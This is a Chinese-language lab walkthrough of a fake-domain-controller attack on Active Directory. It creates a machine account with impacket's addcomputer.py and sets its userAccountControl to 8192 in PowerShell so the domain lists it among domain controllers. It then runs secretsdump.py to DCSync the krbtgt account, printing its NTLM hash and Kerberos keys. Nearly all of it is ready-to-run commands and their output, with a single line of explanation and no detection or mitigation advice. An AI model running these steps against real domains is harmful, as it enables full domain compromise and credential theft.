一、漏洞原理
新建一个机器账户,并把账户的 UserAccountControl 属性为 8192,8192 为一个特殊的属性标志,活动目录就会认为这个机器账户是域控,然后就可以使用这个机器账户进行 DCSync。
二、伪造域控攻击
先创建一个机器账户
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py sec.local/test3:"Az123456@" -dc-ip 10.10.4.2 -computer-name cmp3 -computer-pass "Az123456@" -method SAMR -debug
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account cmp3$ with password Az123456@.
然后修改UserAccountControl属性
PS C:\Users\Administrator.SEC> $ADComputer = Get-ADComputer -Identity cmp3
PS C:\Users\Administrator.SEC> Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192}
PS C:\Users\Administrator.SEC> net group "domain controllers" /domain
Group name Domain Controllers
Comment All domain controllers in the domain
Members
-------------------------------------------------------------------------------
cmp3$ WIN2016-DC2$ WIN2019-DC1$
WIN2019-DC3$
The command completed successfully.
PS C:\Users\Administrator.SEC>
验证
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/secretsdump.py sec.local/cmp3\$:"Az123456@"@10.10.4.7 -just-dc-user "sec\krbtgt"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...